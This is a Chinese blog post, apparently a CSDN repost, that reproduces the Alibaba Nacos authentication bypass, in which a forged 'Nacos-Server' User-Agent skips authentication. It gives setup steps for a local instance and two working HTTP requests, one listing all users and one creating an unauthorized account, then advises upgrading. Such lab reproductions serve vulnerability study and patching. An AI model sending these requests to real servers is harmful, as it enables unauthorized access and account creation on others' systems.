Alibaba Nacos未授权访问漏洞复现

漏洞概述

 

Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的认证绕过漏洞。通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作。

 

影响版本

 

Nacos <= 2.0.0-ALPHA.1

 

环境搭建

 

这里我们下载 nacos2.0.0-ALPHA.1版本的

下载地址

https://github.com/alibaba/nacos/releases/download/2.0.0-ALPHA.1/nacos-server-2.0.0-ALPHA.1.tar.gz

 

解压

tar -zxvf nacos-server-2.0.0-ALPHA.1.tar.gz

进入nacos的bin目录

cd nacos/bin

清除windows启动脚本

rm -rf *.cmd

启动单节点模式

./startup.sh -m standalone 

 

扫描二维码关注公众号,回复: 12443178 查看本文章

访问http://127.0.0.1:8848/nacos即可看到页面

默认账号密码:nacos,nacos

 

漏洞复现

poc

GET /nacos/v1/auth/users?pageNo=1&pageSize=100 HTTP/1.1

Host: 127.0.0.1:8848

User-Agent: Nacos-Server

Connection: close

 

构建数据包进行发送

添加用户测试


POST /nacos/v1/auth/users HTTP/1.1

Host:127.0.0.1:8848

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

User-Agent: Nacos-Server

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 27



username=test&password=test

添加成功

 

修复建议

 

升级到安全版本

 

猜你喜欢

转载自blog.csdn.net/xuandao_ahfengren/article/details/112724542